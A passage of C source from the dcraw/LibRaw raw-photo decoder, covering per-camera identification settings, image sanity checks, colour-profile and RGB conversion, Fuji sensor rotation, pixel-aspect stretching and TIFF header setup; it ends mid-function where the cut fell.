load_raw = &CLASS unpacked_load_raw;
} else if (!strcmp(model,"STV680 VGA")) {
black = 16;
} else if (!strcmp(model,"N95")) {
height = raw_height - (top_margin = 2);
} else if (!strcmp(model,"640x480")) {
gamma_curve (0.45, 4.5, 1, 255);
} else if (!strncmp(make,"Hasselblad",10)) {
if (load_raw == &CLASS lossless_jpeg_load_raw)
load_raw = &CLASS hasselblad_load_raw;
if (raw_width == 7262) {
height = 5444;
width = 7248;
top_margin = 4;
left_margin = 7;
filters = 0x61616161;
if(!strncasecmp(model,"H3D",3))
{
adobe_coeff("Hasselblad","H3DII-39");
strcpy(model,"H3DII-39");
}
} else if (raw_width == 7410 || raw_width == 8282) {
height -= 84;
width -= 82;
top_margin = 4;
left_margin = 41;
filters = 0x61616161;
adobe_coeff("Hasselblad","H4D-40");
strcpy(model,"H4D-40");
}
else if( raw_width == 8384) // X1D
{
top_margin = 96;
height -= 96;
left_margin = 48;
width -= 106;
adobe_coeff("Hasselblad","X1D");
}
else if (raw_width == 9044) {
if(black > 500)
{
top_margin = 12;
left_margin = 44;
width = 8956;
height = 6708;
memset(cblack,0,sizeof(cblack));
adobe_coeff("Hasselblad","H4D-60");
strcpy(model,"H4D-60");
black = 512;
}
else
{
height = 6716;
width = 8964;
top_margin = 8;
left_margin = 40;
black += load_flags = 256;
maximum = 0x8101;
strcpy(model,"H3DII-60");
}
} else if (raw_width == 4090) {
strcpy (model, "V96C");
height -= (top_margin = 6);
width -= (left_margin = 3) + 7;
filters = 0x61616161;
} else if (raw_width == 8282 && raw_height == 6240) {
if(!strncasecmp(model,"H5D",3))
{
/* H5D 50*/
left_margin = 54;
top_margin = 16;
width = 8176;
height = 6132;
black = 256;
strcpy(model,"H5D-50");
}
else if(!strncasecmp(model,"H3D",3))
{
black=0;
left_margin = 54;
top_margin = 16;
width = 8176;
height = 6132;
memset(cblack,0,sizeof(cblack));
adobe_coeff("Hasselblad","H3D-50");
strcpy(model,"H3D-50");
}
} else if (raw_width == 8374 && raw_height == 6304) {
/* H5D 50c*/
left_margin = 52;
top_margin = 100;
width = 8272;
height = 6200;
black = 256;
strcpy(model,"H5D-50c");
}
if (tiff_samples > 1) {
is_raw = tiff_samples+1;
if (!shot_select && !half_size) filters = 0;
}
} else if (!strncmp(make,"Sinar",5)) {
if (!load_raw) load_raw = &CLASS unpacked_load_raw;
if (is_raw > 1 && !shot_select && !half_size) filters = 0;
maximum = 0x3fff;
} else if (!strncmp(make,"Leaf",4)) {
maximum = 0x3fff;
fseek (ifp, data_offset, SEEK_SET);
if (ljpeg_start (&jh, 1) && jh.bits == 15)
maximum = 0x1fff;
if (tiff_samples > 1) filters = 0;
if (tiff_samples > 1 || tile_length < raw_height) {
load_raw = &CLASS leaf_hdr_load_raw;
raw_width = tile_width;
}
if ((width | height) == 2048) {
if (tiff_samples == 1) {
filters = 1;
strcpy (cdesc, "RBTG");
strcpy (model, "CatchLight");
top_margin = 8; left_margin = 18; height = 2032; width = 2016;
} else {
strcpy (model, "DCB2");
top_margin = 10; left_margin = 16; height = 2028; width = 2022;
}
} else if (width+height == 3144+2060) {
if (!model[0]) strcpy (model, "Cantare");
if (width > height) {
top_margin = 6; left_margin = 32; height = 2048; width = 3072;
filters = 0x61616161;
} else {
left_margin = 6; top_margin = 32; width = 2048; height = 3072;
filters = 0x16161616;
}
if (!cam_mul[0] || model[0] == 'V') filters = 0;
else is_raw = tiff_samples;
} else if (width == 2116) {
strcpy (model, "Valeo 6");
height -= 2 * (top_margin = 30);
width -= 2 * (left_margin = 55);
filters = 0x49494949;
} else if (width == 3171) {
strcpy (model, "Valeo 6");
height -= 2 * (top_margin = 24);
width -= 2 * (left_margin = 24);
filters = 0x16161616;
}
} else if (!strncmp(make,"Leica",5) || !strncmp(make,"Panasonic",9)
|| !strncasecmp(make,"YUNEEC",6)) {
if (raw_width > 0 && ((flen - data_offset) / (raw_width*8/7) == raw_height) )
load_raw = &CLASS panasonic_load_raw;
if (!load_raw) {
load_raw = &CLASS unpacked_load_raw;
load_flags = 4;
}
zero_is_bad = 1;
if ((height += 12) > raw_height) height = raw_height;
for (i=0; i < sizeof pana / sizeof *pana; i++)
if (raw_width == pana[i][0] && raw_height == pana[i][1]) {
left_margin = pana[i][2];
top_margin = pana[i][3];
width += pana[i][4];
height += pana[i][5];
}
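/* Pick the Bayer pattern byte from a four-entry lookup, indexed by the stored filter value adjusted for crop-margin parity */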
filters = 0x01010101 * (uchar) "\x94\x61\x49\x16"
[((filters-1) ^ (left_margin & 1) ^ (top_margin << 1)) & 3];
} else if (!strcmp(model,"C770UZ")) {
height = 1718;
width = 2304;
filters = 0x16161616;
load_raw = &CLASS packed_load_raw;
load_flags = 30;
} else if (!strncmp(make,"Olympus",7)) {
height += height & 1;
if (exif_cfa) filters = exif_cfa;
if (width == 4100) width -= 4;
if (width == 4080) width -= 24;
if (width == 9280) { width -= 6; height -= 6; }
if (load_raw == &CLASS unpacked_load_raw)
load_flags = 4;
tiff_bps = 12;
if (!strcmp(model,"E-300") ||
!strcmp(model,"E-500")) {
width -= 20;
if (load_raw == &CLASS unpacked_load_raw) {
maximum = 0xfc3;
memset (cblack, 0, sizeof cblack);
}
} else if (!strcmp(model,"STYLUS1")) {
width -= 14;
maximum = 0xfff;
} else if (!strcmp(model,"E-330")) {
width -= 30;
if (load_raw == &CLASS unpacked_load_raw)
maximum = 0xf79;
} else if (!strcmp(model,"SP550UZ")) {
thumb_length = flen - (thumb_offset = 0xa39800);
thumb_height = 480;
thumb_width = 640;
} else if (!strcmp(model,"TG-4")) {
width -= 16;
}
} else if (!strcmp(model,"N Digital")) {
height = 2047;
width = 3072;
filters = 0x61616161;
data_offset = 0x1a00;
load_raw = &CLASS packed_load_raw;
} else if (!strcmp(model,"DSC-F828")) {
width = 3288;
left_margin = 5;
mask[1][3] = -17;
data_offset = 862144;
load_raw = &CLASS sony_load_raw;
filters = 0x9c9c9c9c;
colors = 4;
strcpy (cdesc, "RGBE");
} else if (!strcmp(model,"DSC-V3")) {
width = 3109;
left_margin = 59;
mask[0][1] = 9;
data_offset = 787392;
load_raw = &CLASS sony_load_raw;
} else if (!strncmp(make,"Sony",4) && raw_width == 3984) {
width = 3925;
order = 0x4d4d;
} else if (!strncmp(make,"Sony",4) && raw_width == 4288) {
width -= 32;
} else if (!strcmp(make, "Sony") && raw_width == 4600) {
if (!strcmp(model, "DSLR-A350"))
height -= 4;
black = 0;
} else if (!strncmp(make,"Sony",4) && raw_width == 4928) {
if (height < 3280) width -= 8;
} else if (!strncmp(make,"Sony",4) && raw_width == 5504) { // ILCE-3000//5000
width -= height > 3664 ? 8 : 32;
} else if (!strncmp(make,"Sony",4) && raw_width == 6048) {
width -= 24;
if (strstr(model,"RX1") || strstr(model,"A99"))
width -= 6;
} else if (!strncmp(make,"Sony",4) && raw_width == 7392) {
width -= 30;
} else if (!strncmp(make,"Sony",4) && raw_width == 8000) {
width -= 32;
if (!strncmp(model, "DSC", 3)) {
tiff_bps = 14;
load_raw = &CLASS unpacked_load_raw;
}
} else if (!strcmp(model,"DSLR-A100")) {
if (width == 3880) {
height--;
width = ++raw_width;
} else {
height -= 4;
width -= 4;
order = 0x4d4d;
load_flags = 2;
}
filters = 0x61616161;
} else if (!strcmp(model,"PIXL")) {
height -= top_margin = 4;
width -= left_margin = 32;
gamma_curve (0, 7, 1, 255);
} else if (!strcmp(model,"C603") || !strcmp(model,"C330")
|| !strcmp(model,"12MP")) {
order = 0x4949;
if (filters && data_offset) {
fseek (ifp, data_offset < 4096 ? 168 : 5252, SEEK_SET);
read_shorts (curve, 256);
} else gamma_curve (0, 3.875, 1, 255);
load_raw = filters ? &CLASS eight_bit_load_raw :
strcmp(model,"C330") ? &CLASS kodak_c603_load_raw :
&CLASS kodak_c330_load_raw;
load_flags = tiff_bps > 16;
tiff_bps = 8;
} else if (!strncasecmp(model,"EasyShare",9)) {
data_offset = data_offset < 0x15000 ? 0x15000 : 0x17000;
load_raw = &CLASS packed_load_raw;
} else if (!strncasecmp(make,"Kodak",5)) {
if (filters == UINT_MAX) filters = 0x61616161;
if (!strncmp(model,"NC2000",6) ||
!strncmp(model,"EOSDCS",6) ||
!strncmp(model,"DCS4",4)) {
width -= 4;
left_margin = 2;
if (model[6] == ' ') model[6] = 0;
if (!strcmp(model,"DCS460A")) goto bw;
} else if (!strcmp(model,"DCS660M")) {
black = 214;
goto bw;
} else if (!strcmp(model,"DCS760M")) {
bw: colors = 1;
filters = 0;
}
if (!strcmp(model+4,"20X"))
strcpy (cdesc, "MYCY");
if (strstr(model,"DC25")) {
strcpy (model, "DC25");
data_offset = 15424;
}
if (!strncmp(model,"DC2",3)) {
raw_height = 2 + (height = 242);
if (!strncmp(model, "DC290", 5))
iso_speed = 100;
if (!strncmp(model, "DC280", 5))
iso_speed = 70;
if (flen < 100000) {
raw_width = 256; width = 249;
pixel_aspect = (4.0*height) / (3.0*width);
} else {
raw_width = 512; width = 501;
pixel_aspect = (493.0*height) / (373.0*width);
}
top_margin = left_margin = 1;
colors = 4;
filters = 0x8d8d8d8d;
simple_coeff(1);
pre_mul[1] = 1.179;
pre_mul[2] = 1.209;
pre_mul[3] = 1.036;
load_raw = &CLASS eight_bit_load_raw;
} else if (!strcmp(model,"40")) {
strcpy (model, "DC40");
height = 512;
width = 768;
data_offset = 1152;
load_raw = &CLASS kodak_radc_load_raw;
tiff_bps = 12;
} else if (strstr(model,"DC50")) {
strcpy (model, "DC50");
height = 512;
width = 768;
iso_speed=84;
data_offset = 19712;
load_raw = &CLASS kodak_radc_load_raw;
} else if (strstr(model,"DC120")) {
strcpy (model, "DC120");
height = 976;
width = 848;
iso_speed=160;
pixel_aspect = height/0.75/width;
load_raw = tiff_compress == 7 ?
&CLASS kodak_jpeg_load_raw : &CLASS kodak_dc120_load_raw;
} else if (!strcmp(model,"DCS200")) {
thumb_height = 128;
thumb_width = 192;
thumb_offset = 6144;
thumb_misc = 360;
iso_speed=140;
write_thumb = &CLASS layer_thumb;
black = 17;
}
} else if (!strcmp(model,"Fotoman Pixtura")) {
height = 512;
width = 768;
data_offset = 3632;
load_raw = &CLASS kodak_radc_load_raw;
filters = 0x61616161;
simple_coeff(2);
} else if (!strncmp(model,"QuickTake",9)) {
if (head[5]) strcpy (model+10, "200");
fseek (ifp, 544, SEEK_SET);
height = get2();
width = get2();
data_offset = (get4(),get2()) == 30 ? 738:736;
if (height > width) {
SWAP(height,width);
fseek (ifp, data_offset-6, SEEK_SET);
flip = ~get2() & 3 ? 5:6;
}
filters = 0x61616161;
} else if (!strncmp(make,"Rollei",6) && !load_raw) {
switch (raw_width) {
case 1316:
height = 1030;
width = 1300;
top_margin = 1;
left_margin = 6;
break;
case 2568:
height = 1960;
width = 2560;
top_margin = 2;
left_margin = 8;
}
filters = 0x16161616;
load_raw = &CLASS rollei_load_raw;
}
else if (!strcmp(model,"GRAS-50S5C")) {
height = 2048;
width = 2440;
load_raw = &CLASS unpacked_load_raw;
data_offset = 0;
filters = 0x49494949;
order = 0x4949;
maximum = 0xfffC;
} else if (!strcmp(model,"BB-500CL")) {
height = 2058;
width = 2448;
load_raw = &CLASS unpacked_load_raw;
data_offset = 0;
filters = 0x94949494;
order = 0x4949;
maximum = 0x3fff;
} else if (!strcmp(model,"BB-500GE")) {
height = 2058;
width = 2456;
load_raw = &CLASS unpacked_load_raw;
data_offset = 0;
filters = 0x94949494;
order = 0x4949;
maximum = 0x3fff;
} else if (!strcmp(model,"SVS625CL")) {
height = 2050;
width = 2448;
load_raw = &CLASS unpacked_load_raw;
data_offset = 0;
filters = 0x94949494;
order = 0x4949;
maximum = 0x0fff;
}
/* Early reject for damaged images */
if (!load_raw || height < 22 || width < 22 ||
#ifdef LIBRAW_LIBRARY_BUILD
(tiff_bps > 16 && load_raw != &LibRaw::deflate_dng_load_raw)
#else
tiff_bps > 16
#endif
|| tiff_samples > 4 || colors > 4 || colors < 1
/* alloc in unpack() may be fooled by size adjust */
|| ( (int)width + (int)left_margin > 65535)
|| ( (int)height + (int)top_margin > 65535)
)
{
is_raw = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_IDENTIFY,1,2);
#endif
return;
}
if (!model[0])
sprintf (model, "%dx%d", width, height);
if (filters == UINT_MAX) filters = 0x94949494;
if (thumb_offset && !thumb_height) {
fseek (ifp, thumb_offset, SEEK_SET);
if (ljpeg_start (&jh, 1)) {
thumb_width = jh.wide;
thumb_height = jh.high;
}
}
dng_skip:
#ifdef LIBRAW_LIBRARY_BUILD
if(dng_version) /* Override black level by DNG tags */
{
black = imgdata.color.dng_levels.dng_black;
int ll = LIM(0,
(sizeof(cblack)/sizeof(cblack[0])),
(sizeof(imgdata.color.dng_levels.dng_cblack)/sizeof(imgdata.color.dng_levels.dng_cblack[0])));
for(int i=0; i < ll; i++)
cblack[i] = imgdata.color.dng_levels.dng_cblack[i];
}
#endif
/* Early reject for damaged images */
if (!load_raw || height < 22 || width < 22 ||
#ifdef LIBRAW_LIBRARY_BUILD
(tiff_bps > 16 && load_raw != &LibRaw::deflate_dng_load_raw)
#else
tiff_bps > 16
#endif
|| tiff_samples > 4 || colors > 4 || colors < 1)
{
is_raw = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_IDENTIFY,1,2);
#endif
return;
}
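/* Embedded color matrix: use_camera_matrix bit 1 forces it, bit 0 allows it only with camera WB or DNG,
   and in any case cmatrix must look sane (cmatrix[0][0] > 0.125) */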
if ((use_camera_matrix & ((use_camera_wb || dng_version) | 0x2) )
&& cmatrix[0][0] > 0.125) {
memcpy (rgb_cam, cmatrix, sizeof cmatrix);
raw_color = 0;
}
if (raw_color) adobe_coeff (make, model);
#ifdef LIBRAW_LIBRARY_BUILD
else if(imgdata.color.cam_xyz[0][0]<0.01)
adobe_coeff (make, model,1);
#endif
if (load_raw == &CLASS kodak_radc_load_raw)
if (raw_color) adobe_coeff ("Apple","Quicktake");
#ifdef LIBRAW_LIBRARY_BUILD
// Clear erroneous fuji_width if it was not set by parse_fuji (and this is not a DNG)
if(fuji_width && !dng_version && !(imgdata.process_warnings & LIBRAW_WARN_PARSEFUJI_PROCESSED ))
fuji_width = 0;
#endif
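/* Fuji Super CCD data is stored on a 45-degree grid; derive the nominal diagonal geometry here
   and let fuji_rotate() resample it later */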
if (fuji_width)
{
fuji_width = width >> !fuji_layout;
filters = fuji_width & 1 ? 0x94949494 : 0x49494949;
width = (height >> fuji_layout) + fuji_width;
height = width - 1;
pixel_aspect = 1;
} else {
if (raw_height < height) raw_height = height;
if (raw_width < width ) raw_width = width;
}
if (!tiff_bps) tiff_bps = 12;
if (!maximum)
{
maximum = (1 << tiff_bps) - 1;
if(maximum < 0x10000 && curve[maximum]>0 && load_raw == &CLASS sony_arw2_load_raw)
maximum = curve[maximum];
}
if (!load_raw || height < 22 || width < 22 ||
#ifdef LIBRAW_LIBRARY_BUILD
(tiff_bps > 16 && load_raw != &LibRaw::deflate_dng_load_raw)
#else
tiff_bps > 16
#endif
|| tiff_samples > 6 || colors > 4)
is_raw = 0;
if(raw_width < 22 || raw_width > 64000 || raw_height < 22 || raw_height > 64000)
is_raw = 0;
#ifdef NO_JASPER
if (load_raw == &CLASS redcine_load_raw) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: You must link dcraw with %s!!\n"),
ifname, "libjasper");
#endif
is_raw = 0;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_JASPER;
#endif
}
#endif
#ifdef NO_JPEG
if (load_raw == &CLASS kodak_jpeg_load_raw ||
load_raw == &CLASS lossy_dng_load_raw) {
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s: You must link dcraw with %s!!\n"),
ifname, "libjpeg");
#endif
is_raw = 0;
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_JPEGLIB;
#endif
}
#endif
if (!cdesc[0])
strcpy (cdesc, colors == 3 ? "RGBG":"GMCY");
if (!raw_height) raw_height = height;
if (!raw_width ) raw_width = width;
if (filters > 999 && colors == 3)
filters |= ((filters >> 2 & 0x22222222) |
(filters << 2 & 0x88888888)) & filters << 1;
notraw:
if (flip == UINT_MAX) flip = tiff_flip;
if (flip == UINT_MAX) flip = 0;
// Convert from degrees to bit-field if needed
if(flip > 89 || flip < -89)
{
switch ((flip+3600) % 360)
{
case 270: flip = 5; break;
case 180: flip = 3; break;
case 90: flip = 6; break;
}
}
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_IDENTIFY,1,2);
#endif
}
//@end COMMON
//@out FILEIO
#ifndef NO_LCMS
void CLASS apply_profile (const char *input, const char *output)
{
char *prof;
cmsHPROFILE hInProfile=0, hOutProfile=0;
cmsHTRANSFORM hTransform;
FILE *fp;
unsigned size;
if (strcmp (input, "embed"))
hInProfile = cmsOpenProfileFromFile (input, "r");
else if (profile_length) {
#ifndef LIBRAW_LIBRARY_BUILD
prof = (char *) malloc (profile_length);
merror (prof, "apply_profile()");
fseek (ifp, profile_offset, SEEK_SET);
fread (prof, 1, profile_length, ifp);
hInProfile = cmsOpenProfileFromMem (prof, profile_length);
free (prof);
#else
hInProfile = cmsOpenProfileFromMem (imgdata.color.profile, profile_length);
#endif
} else
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_EMBEDDED_PROFILE;
#endif
#ifdef DCRAW_VERBOSE
fprintf (stderr,_("%s has no embedded profile.\n"), ifname);
#endif
}
if (!hInProfile)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_NO_INPUT_PROFILE;
#endif
return;
}
if (!output)
hOutProfile = cmsCreate_sRGBProfile();
else if ((fp = fopen (output, "rb"))) {
fread (&size, 4, 1, fp);
fseek (fp, 0, SEEK_SET);
oprof = (unsigned *) malloc (size = ntohl(size));
merror (oprof, "apply_profile()");
fread (oprof, 1, size, fp);
fclose (fp);
if (!(hOutProfile = cmsOpenProfileFromMem (oprof, size))) {
free (oprof);
oprof = 0;
}
}
#ifdef DCRAW_VERBOSE
else
fprintf (stderr,_("Cannot open file %s!\n"), output);
#endif
if (!hOutProfile)
{
#ifdef LIBRAW_LIBRARY_BUILD
imgdata.process_warnings |= LIBRAW_WARN_BAD_OUTPUT_PROFILE;
#endif
goto quit;
}
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Applying color profile...\n"));
#endif
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_APPLY_PROFILE,0,2);
#endif
hTransform = cmsCreateTransform (hInProfile, TYPE_RGBA_16,
hOutProfile, TYPE_RGBA_16, INTENT_PERCEPTUAL, 0);
cmsDoTransform (hTransform, image, image, width*height);
raw_color = 1; /* Don't use rgb_cam with a profile */
cmsDeleteTransform (hTransform);
cmsCloseProfile (hOutProfile);
quit:
cmsCloseProfile (hInProfile);
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_APPLY_PROFILE,1,2);
#endif
}
#endif
//@end FILEIO
//@out COMMON
void CLASS convert_to_rgb()
{
#ifndef LIBRAW_LIBRARY_BUILD
int row, col, c;
#endif
int i, j, k;
#ifndef LIBRAW_LIBRARY_BUILD
ushort *img;
float out[3];
#endif
float out_cam[3][4];
double num, inverse[3][3];
static const double xyzd50_srgb[3][3] =
{ { 0.436083, 0.385083, 0.143055 },
{ 0.222507, 0.716888, 0.060608 },
{ 0.013930, 0.097097, 0.714022 } };
static const double rgb_rgb[3][3] =
{ { 1,0,0 }, { 0,1,0 }, { 0,0,1 } };
static const double adobe_rgb[3][3] =
{ { 0.715146, 0.284856, 0.000000 },
{ 0.000000, 1.000000, 0.000000 },
{ 0.000000, 0.041166, 0.958839 } };
static const double wide_rgb[3][3] =
{ { 0.593087, 0.404710, 0.002206 },
{ 0.095413, 0.843149, 0.061439 },
{ 0.011621, 0.069091, 0.919288 } };
static const double prophoto_rgb[3][3] =
{ { 0.529317, 0.330092, 0.140588 },
{ 0.098368, 0.873465, 0.028169 },
{ 0.016879, 0.117663, 0.865457 } };
static const double aces_rgb[3][3] =
{ { 0.432996, 0.375380, 0.189317 },
{ 0.089427, 0.816523, 0.102989 },
{ 0.019165, 0.118150, 0.941914 } };
static const double (*out_rgb[])[3] =
{ rgb_rgb, adobe_rgb, wide_rgb, prophoto_rgb, xyz_rgb, aces_rgb };
static const char *name[] =
{ "sRGB", "Adobe RGB (1998)", "WideGamut D65", "ProPhoto D65", "XYZ", "ACES" };
static const unsigned phead[] =
{ 1024, 0, 0x2100000, 0x6d6e7472, 0x52474220, 0x58595a20, 0, 0, 0,
0x61637370, 0, 0, 0x6e6f6e65, 0, 0, 0, 0, 0xf6d6, 0x10000, 0xd32d };
unsigned pbody[] =
{ 10, 0x63707274, 0, 36, /* cprt */
0x64657363, 0, 40, /* desc */
0x77747074, 0, 20, /* wtpt */
0x626b7074, 0, 20, /* bkpt */
0x72545243, 0, 14, /* rTRC */
0x67545243, 0, 14, /* gTRC */
0x62545243, 0, 14, /* bTRC */
0x7258595a, 0, 20, /* rXYZ */
0x6758595a, 0, 20, /* gXYZ */
0x6258595a, 0, 20 }; /* bXYZ */
static const unsigned pwhite[] = { 0xf351, 0x10000, 0x116cc };
unsigned pcurve[] = { 0x63757276, 0, 1, 0x1000000 };
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_CONVERT_RGB,0,2);
#endif
gamma_curve (gamm[0], gamm[1], 0, 0);
memcpy (out_cam, rgb_cam, sizeof out_cam);
#ifndef LIBRAW_LIBRARY_BUILD
raw_color |= colors == 1 || document_mode ||
output_color < 1 || output_color > 6;
#else
raw_color |= colors == 1 ||
output_color < 1 || output_color > 6;
#endif
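/* When converting to an output colorspace, synthesize a minimal ICC profile (header, tag table,
   white point, gamma curves and the RGB->XYZ matrix) describing that space */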
if (!raw_color) {
oprof = (unsigned *) calloc (phead[0], 1);
merror (oprof, "convert_to_rgb()");
memcpy (oprof, phead, sizeof phead);
if (output_color == 5) oprof[4] = oprof[5];
oprof[0] = 132 + 12*pbody[0];
for (i=0; i < pbody[0]; i++) {
oprof[oprof[0]/4] = i ? (i > 1 ? 0x58595a20 : 0x64657363) : 0x74657874;
pbody[i*3+2] = oprof[0];
oprof[0] += (pbody[i*3+3] + 3) & -4;
}
memcpy (oprof+32, pbody, sizeof pbody);
oprof[pbody[5]/4+2] = strlen(name[output_color-1]) + 1;
memcpy ((char *)oprof+pbody[8]+8, pwhite, sizeof pwhite);
pcurve[3] = (short)(256/gamm[5]+0.5) << 16;
for (i=4; i < 7; i++)
memcpy ((char *)oprof+pbody[i*3+2], pcurve, sizeof pcurve);
pseudoinverse ((double (*)[3]) out_rgb[output_color-1], inverse, 3);
for (i=0; i < 3; i++)
for (j=0; j < 3; j++) {
for (num = k=0; k < 3; k++)
num += xyzd50_srgb[i][k] * inverse[j][k];
oprof[pbody[j*3+23]/4+i+2] = num * 0x10000 + 0.5;
}
for (i=0; i < phead[0]/4; i++)
oprof[i] = htonl(oprof[i]);
strcpy ((char *)oprof+pbody[2]+8, "auto-generated by dcraw");
strcpy ((char *)oprof+pbody[5]+12, name[output_color-1]);
for (i=0; i < 3; i++)
for (j=0; j < colors; j++)
for (out_cam[i][j] = k=0; k < 3; k++)
out_cam[i][j] += out_rgb[output_color-1][i][k] * rgb_cam[k][j];
}
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr, raw_color ? _("Building histograms...\n") :
_("Converting to %s colorspace...\n"), name[output_color-1]);
#endif
#ifdef LIBRAW_LIBRARY_BUILD
convert_to_rgb_loop(out_cam);
#else
memset (histogram, 0, sizeof histogram);
for (img=image[0], row=0; row < height; row++)
for (col=0; col < width; col++, img+=4) {
if (!raw_color) {
out[0] = out[1] = out[2] = 0;
FORCC {
out[0] += out_cam[0][c] * img[c];
out[1] += out_cam[1][c] * img[c];
out[2] += out_cam[2][c] * img[c];
}
FORC3 img[c] = CLIP((int) out[c]);
}
else if (document_mode)
img[0] = img[fcol(row,col)];
FORCC histogram[c][img[c] >> 3]++;
}
#endif
if (colors == 4 && output_color) colors = 3;
#ifndef LIBRAW_LIBRARY_BUILD
if (document_mode && filters) colors = 1;
#endif
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_CONVERT_RGB,1,2);
#endif
}
void CLASS fuji_rotate()
{
int i, row, col;
double step;
float r, c, fr, fc;
unsigned ur, uc;
ushort wide, high, (*img)[4], (*pix)[4];
if (!fuji_width) return;
#ifdef DCRAW_VERBOSE
if (verbose)
fprintf (stderr,_("Rotating image 45 degrees...\n"));
#endif
fuji_width = (fuji_width - 1 + shrink) >> shrink;
step = sqrt(0.5);
wide = fuji_width / step;
high = (height - fuji_width) / step;
img = (ushort (*)[4]) calloc (high, wide*sizeof *img);
merror (img, "fuji_rotate()");
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_FUJI_ROTATE,0,2);
#endif
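/* Bilinearly resample the 45-degree grid onto an axis-aligned grid */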
for (row=0; row < high; row++)
for (col=0; col < wide; col++) {
ur = r = fuji_width + (row-col)*step;
uc = c = (row+col)*step;
if (ur > height-2 || uc > width-2) continue;
fr = r - ur;
fc = c - uc;
pix = image + ur*width + uc;
for (i=0; i < colors; i++)
img[row*wide+col][i] =
(pix[ 0][i]*(1-fc) + pix[ 1][i]*fc) * (1-fr) +
(pix[width][i]*(1-fc) + pix[width+1][i]*fc) * fr;
}
free (image);
width = wide;
height = high;
image = img;
fuji_width = 0;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_FUJI_ROTATE,1,2);
#endif
}
void CLASS stretch()
{
ushort newdim, (*img)[4], *pix0, *pix1;
int row, col, c;
double rc, frac;
if (pixel_aspect == 1) return;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_STRETCH,0,2);
#endif
#ifdef DCRAW_VERBOSE
if (verbose) fprintf (stderr,_("Stretching the image...\n"));
#endif
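/* Resample one axis with linear interpolation so output pixels become square */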
if (pixel_aspect < 1) {
newdim = height / pixel_aspect + 0.5;
img = (ushort (*)[4]) calloc (width, newdim*sizeof *img);
merror (img, "stretch()");
for (rc=row=0; row < newdim; row++, rc+=pixel_aspect) {
frac = rc - (c = rc);
pix0 = pix1 = image[c*width];
if (c+1 < height) pix1 += width*4;
for (col=0; col < width; col++, pix0+=4, pix1+=4)
FORCC img[row*width+col][c] = pix0[c]*(1-frac) + pix1[c]*frac + 0.5;
}
height = newdim;
} else {
newdim = width * pixel_aspect + 0.5;
img = (ushort (*)[4]) calloc (height, newdim*sizeof *img);
merror (img, "stretch()");
for (rc=col=0; col < newdim; col++, rc+=1/pixel_aspect) {
frac = rc - (c = rc);
pix0 = pix1 = image[c];
if (c+1 < width) pix1 += 4;
for (row=0; row < height; row++, pix0+=width*4, pix1+=width*4)
FORCC img[row*newdim+col][c] = pix0[c]*(1-frac) + pix1[c]*frac + 0.5;
}
width = newdim;
}
free (image);
image = img;
#ifdef LIBRAW_LIBRARY_BUILD
RUN_CALLBACK(LIBRAW_PROGRESS_STRETCH,1,2);
#endif
}
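/* Map output (row,col) back to an index in the unflipped image buffer;
   flip bit 2 (value 4) transposes, bit 1 mirrors rows, bit 0 mirrors columns */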
int CLASS flip_index (int row, int col)
{
if (flip & 4) SWAP(row,col);
if (flip & 2) row = iheight - 1 - row;
if (flip & 1) col = iwidth - 1 - col;
return row * iwidth + col;
}
//@end COMMON
struct tiff_tag {
ushort tag, type;
int count;
union { char c[4]; short s[2]; int i; } val;
};
struct tiff_hdr {
ushort t_order, magic;
int ifd;
ushort pad, ntag;
struct tiff_tag tag[23];
int nextifd;
ushort pad2, nexif;
struct tiff_tag exif[4];
ushort pad3, ngps;
struct tiff_tag gpst[10];
short bps[4];
int rat[10];
unsigned gps[26];
char t_desc[512], t_make[64], t_model[64], soft[32], date[20], t_artist[64];
};
//@out COMMON
void CLASS tiff_set (struct tiff_hdr *th, ushort *ntag,
ushort tag, ushort type, int count, int val)
{
struct tiff_tag *tt;
int c;
tt = (struct tiff_tag *)(ntag+1) + (*ntag)++;
tt->val.i = val;
if (type == 1 && count <= 4)
FORC(4) tt->val.c[c] = val >> (c << 3);
else if (type == 2) {
count = strnlen((char *)th + val, count-1) + 1;
if (count <= 4)
FORC(4) tt->val.c[c] = ((char *)th)[val+c];
} else if (type == 3 && count <= 2)
FORC(2) tt->val.s[c] = val >> (c << 4);
tt->count = count;
tt->type = type;
tt->tag = tag;
}
#define TOFF(ptr) ((char *)(&(ptr)) - (char *)th)
void CLASS tiff_head (struct tiff_hdr *th, int full)
{
int c, psize=0;
struct tm *t;
memset (th, 0, sizeof *th);
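/* htonl() makes this host-order dependent: "II" (0x4949) on little-endian hosts, "MM" (0x4d4d) on big-endian */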
th->t_order = htonl(0x4d4d4949) >> 16;
th->magic = 42;
th->ifd = 10;
th->rat[0] = th->rat[2] = 300;
th->rat[1] = th->rat[3] = 1;
FORC(6) th->rat[4+c] = 1000000;
th->rat[4] *= shutter;
th->rat[6] *= aperture;
th->rat[8] *= focal_len;
strncpy (th->t_desc, desc, 512);
strncpy (th->t_make, make, 64);
strncpy (th->t_model, model, 64);
strcpy (th->soft, "dcraw v" DCRAW_VERSION);
t = localtime (&timestamp);
sprintf (th->date, "%04d:%02d:%02d %02d:%02d:%02d",
